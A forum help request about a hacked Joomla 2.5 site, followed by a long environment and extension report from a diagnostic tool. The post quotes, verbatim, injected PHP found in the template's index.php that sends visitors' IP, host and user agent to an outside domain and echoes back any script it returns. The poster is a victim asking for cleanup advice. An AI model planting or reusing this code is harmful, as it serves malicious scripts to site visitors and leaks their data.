I 've been having serious trouble while trying to perform a local migration of a Joomla 2.5 website.
When I try to access the locally installed site all I get is a 'site offline' .jpg that resides in the live server.
The back-end of the locally installed site seems to be working, but the front-end just doesn't appear.
After an inspection of the template/index.php I found the following suspicious code :
Code: Select all
#12960a#
error_reporting(0); ini_set('display_errors',0); $wp_lr76585 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_lr76585) && !preg_match ('/bot/i', $wp_lr76585))){
$wp_lr0976585="http://"."style"."object".".com/object"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_lr76585);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_lr0976585);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_76585lr = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_76585lr,1,3) === 'scr' ){ echo $wp_76585lr; }
#/12960a#
It seems to me that the site has been hacked, but I could certainly use some expert advice on what needs to be done, from now on.
In case it helps, this is the outpost of the FPA :
Problem Description :: Forum Post Assistant (v1.2.4) : 27th November 2014 wrote:Suspicious code in template/index.php
Forum Post Assistant (v1.2.4) : 27th November 2014 wrote:Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.19-Stable (Ember) 6-March-2014
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: siteowner (uid: 1/gid: 1) | Group: psacln (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 1 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: N/A | Unicode Slugs: N/A | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.32-358.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /var/www/vhosts/blahblahblah | System TMP Writable: Yes
PHP Configuration :: Version: 5.4.32 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: | Error Reporting: 22527 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: /var/www/vhosts/blahblah/:/tmp/ | Uploads: 1 | Max. Upload Size: 64M | Max. POST Size: 64M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M
MySQL Configuration :: Version: 5.5.39-MariaDB (Client:mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 11.30 MiB | #of Tables: 207Detailed Environment :: wrote:PHP Extensions :: Core (5.4.32) | date (5.4.32) | ereg () | libxml () | openssl () | pcre () | zlib (2.0) | bz2 () | calendar () | ctype () | hash (1.0) | filter (0.11.0) | ftp () | gettext () | gmp () | SPL (0.2) | iconv () | pcntl () | readline (5.4.32) | Reflection ($Id: f6367cdb4e3f392af4a6d441a6641de87c2e50c4 $) | session () | standard (5.4.32) | shmop () | SimpleXML (0.1) | sockets () | mbstring () | tokenizer (0.1) | xml () | cgi-fcgi () | bcmath () | curl () | dba () | dom (20031129) | enchant (1.1.0) | fileinfo (1.0.5) | gd () | imap () | intl (1.1.0) | json (1.2.1) | exif (1.4 $Id: 38907b4d942a8d2419060a688aa3c5e5dedcb118 $) | mcrypt () | memcache (3.0.8) | mysqlnd (mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_pgsql (1.0.2) | pdo_sqlite (1.0.1) | pgsql () | Phar (2.0.1) | posix () | pspell () | soap () | sqlite3 (0.7) | sysvmsg () | sysvsem () | sysvshm () | wddx () | XCache (3.0.3) | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | mhash () | XCache Optimizer (3.0.3) | XCache Cacher (3.0.3) | XCache Coverager (3.0.3) | ionCube Loader () | Zend Engine (2.4.0) |
Potential Missing Extensions :: suhosin |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: NoFolder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) ::Extensions Discovered :: wrote:Components :: SITE :: com_mailto (2.5.0) | com_wrapper (2.5.0) |
Components :: ADMIN :: K2 (2.5.7) | COM_K2 (2.6.7) | mod_k2_comments (-) | mod_k2_comments (-) | jmsmultiupload (2.5) | com_users (2.5.0) | com_checkin (2.5.0) | com_search (2.5.0) | com_banners (2.5.0) | com_xmap (2.3.4) | com_login (2.5.0) | com_joomlaupdate (2.5.0) | com_menus (2.5.0) | com_cache (2.5.0) | VIRTUEMART (-) | ECB Currency Converter (1.0) | com_content (2.5.0) | com_templates (2.5.0) | com_finder (2.5.0) | com_categories (2.5.0) | AcyMailing (4.6.2) | AcyMailing : (auto)Subscribe d (4.6.2) | AcyMailing Editor (beta) (4.6.2) | AcyMailing Tag : content inser (3.7.0) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing Module (3.7.0) | AcyMailing Tag : Website links (3.7.0) | AcyMailing Tag : Manage the Su (4.6.2) | AcyMailing : share on social n (1.0.0) | AcyMailing Tag : Subscriber in (4.6.2) | AcyMailing table of contents g (1.0.0) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing Tag : Joomla User I (4.6.2) | AcyMailing Manage text (1.0.0) | AcyMailing Template Class Repl (4.6.2) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing Tag : Date / Time (4.6.2) | com_messages (2.5.0) | com_plugins (2.5.0) | CSVI (5.17) | com_config (2.5.0) | Akeeba (3.10.2) | com_admin (2.5.0) | com_newsfeeds (2.5.0) | VirtueMart_allinone (2.0.26d) | com_cpanel (2.5.0) | com_languages (2.5.0) | com_redirect (2.5.0) | com_modules (2.5.0) | com_media (2.5.0) | com_weblinks (2.5.0) | com_installer (2.5.0) |
Modules :: SITE :: K2 User (2.6.7) | DS Products Slider for Virtuem (1.0) | AddThis Smart Layers (1.0.0) | Tabs GK5 (GK5 1.2) | Social GK5 (GK5 1.1) | mod_random_image (2.5.0) | mod_whosonline (2.5.0) | mod_login (2.5.0) | mod_virtuemart_currencies (2.0.26d) | mod_articles_category (2.5.0) | VirtueMart Shopping Cart (2.0.26d) | mod_virtuemart_search (2.0.18a) | mod_feed (2.5.0) | mod_weblinks (2.5.0) | mod_footer (2.5.0) | DS Virtuemart Bestseller Produ (1.0.0) | K2 Comments (2.6.7) | mod_articles_news (2.5.0) | VM - Flexible Fancy Product Sl (3.0) | mod_menu (2.5.0) | AcyMailing Module (3.7.0) | mod_custom (2.5.0) | mod_finder (2.5.0) | K2 Content (2.6.7) | Easy Like and Share (3.00) | K2 Login (2.5.7) | mod_related_items (2.5.0) | mod_articles_popular (2.5.0) | mod_syndicate (2.5.0) | mod_virtuemart_category (2.0.26d) | mod_articles_latest (2.5.0) | mod_search (2.5.0) | SP VirtueMart Product Slider (1.0.0) | Facebook Slider Likebox (1.0.0) | K2 Tools (2.6.7) | News Show Pro GK5 (1.3.5) | mod_virtuemart_manufacturer (2.0.26d) | K2 Users (2.6.7) | mod_articles_categories (2.5.0) | mod_banners (2.5.0) | Image Show GK4 (GK4 1.38) | mod_breadcrumbs (2.5.0) | Hot Scroller for VirtueMart (2.5.4) | mod_wrapper (2.5.0) | mod_articles_archive (2.5.0) | mod_users_latest (2.5.0) | mod_languages (2.5.0) | mod_stats (2.5.0) | mod_virtuemart_product (2.0.26d) |
Modules :: ADMIN :: mod_latest (2.5.0) | mod_logged (2.5.0) | VirtueMart Administrator Menu (2.6.0) | mod_toolbar (2.5.0) | mod_login (2.5.0) | mod_feed (2.5.0) | mod_quickicon (2.5.0) | mod_menu (2.5.0) | mod_custom (2.5.0) | mod_version (2.5.0) | K2 Stats (admin) (2.6.7) | mod_status (2.5.0) | mod_popular (2.5.0) | K2 Quick Icons (admin) (2.6.7) | mod_submenu (2.5.0) | mod_multilangstatus (2.5.0) | mod_title (2.5.0) |
Plugins :: SITE :: plg_editors-xtd_article (2.5.0) | plg_editors-xtd_image (2.5.0) | Button - GK Typography (1.0.2) | plg_editors-xtd_readmore (2.5.0) | plg_editors-xtd_pagebreak (2.5.0) | XMAP_PLUGIN_K2 (1.3) | Xmap - Virtuemart Plugin (2.0.3) | Xmap - Kunena Plugin (3.0.0) | Xmap - Content Plugin (2.0.4) | Xmap - Mosets Tree Plugin (2.0.2) | Xmap - SobiPro Plugin (2.0.2) | Xmap - WebLinks Plugin (2.0.1) | plg_user_contactcreator (2.5.0) | plg_user_profile (2.5.0) | User - K2 (2.6.7) | plg_user_joomla (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_quickicon_extensionupdate (2.5.0) | VMCustom - textinput (2.0.26d) | VMCustom - specification (2.0.18a) | VMCUSTOM_STOCKABLE (2.0.26d) | plg_authentication_ldap (2.5.0) | Authentication - Facebook (GK4 1.2) | plg_authentication_gmail (2.5.0) | plg_authentication_joomla (2.5.0) | plg_extension_joomla (2.5.0) | VMPAYMENT_MONEYBOOKERS (2.0.6) | Standard (2.0.26d) | Moneybookers iDeal (2.0.6) | VM - Payment, Alpahabank (1.0.0) | VM - Payment, Alpahabank (1.0.0) | Klarna Checkout (2.0.26d) | Sofort Ideal (2.0.26d) | Moneybookers Digital Wallet (2.0.6) | VM - Payment, Systempay (1.3c) | Moneybookers Sofortueberweisun (2.0.6) | VMPAYMENT_PAYPAL (2.0.26d) | Moneybookers Bank Transfer (2.0.6) | Sofort (2.0.26d) | Moneybookers Przelewy24 (2.0.6) | VM - Payment, PayZen (1.3c) | Moneybookers Giropay (2.0.6) | VMPAYMENT_HEIDELPAY (13.11) | Moneybookers Credit Cards (2.0.6) | Authorize.net AIM (2.0.26d) | Klarna (2.0.26d) | Moneybookers Lastschrift (2.0.6) | plg_editors_codemirror (1.0) | AcyMailing Editor (beta) (4.6.2) | plg_editors_tinymce (3.5.4.1) | PLG_EMBED_GOOGLE_MAP (1.5.0) | AddThis - Bookmark and Sharing (2.0.1) | plg_content_emailcloak (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_pagenavigation (2.5.0) | plg_content_geshi (2.5.0) | plg_content_vote (2.5.0) | plg_content_finder (2.5.0) | plg_content_joomla (2.5.0) | plg_content_pagebreak (2.5.0) | Josetta - K2 Categories (2.6.7) | Josetta - K2 Items (2.6.7) | VMSHIPMENT_WEIGHT_COUNTRIES (2.0.26d) | plg_captcha_recaptcha (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_weblinks (2.5.0) | plg_finder_content (2.5.0) | plg_finder_k2 (2.6.7) | plg_system_cache (2.5.0) | System - JMS Multi Upload For (1.0) | plg_system_debug (2.5.0) | plg_system_redirect (2.5.0) | System - GK Menu Extended Para (1.0) | plg_system_languagecode (2.5.0) | plg_system_sl_scrolltotop (2.0.0) | plg_system_log (2.5.0) | plg_system_sef (2.5.0) | AcyMailing : (auto)Subscribe d (4.6.2) | plg_system_p3p (2.5.0) | plg_system_highlight (2.5.0) | Flexible - Virtuemart Zoom Eff (4.1) | plg_system_languagefilter (2.5.0) | plg_system_remember (2.5.0) | plg_system_logout (2.5.0) | System - K2 (2.6.7) | VP One Page Checkout (2.0) | System - GK Cache (1.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing Template Class Repl (4.6.2) | AcyMailing Tag : Joomla User I (4.6.2) | AcyMailing Tag : Date / Time (4.6.2) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing Tag : Manage the Su (4.6.2) | AcyMailing Tag : Subscriber in (4.6.2) | AcyMailing : share on social n (1.0.0) | AcyMailing Tag : content inser (3.7.0) | AcyMailing Tag : Website links (3.7.0) | AcyMailing Manage text (1.0.0) | plg_search_contacts (2.5.0) | plg_search_newsfeeds (2.5.0) | plg_search_categories (2.5.0) | plg_search_virtuemart (2.0.18a) | plg_search_weblinks (2.5.0) | plg_search_content (2.5.0) | Search - K2 (2.6.7) |Templates Discovered :: wrote:Templates :: SITE :: gk_shop_and_buy (3.10.1vm) | atomic (2.5.0) | beez_20 (2.5.0) | beez5 (2.5.0) | gk_shop_and_buy (3.11.1vm) |
Templates :: ADMIN :: hathor (2.5.0) | bluestork (2.5.0) |
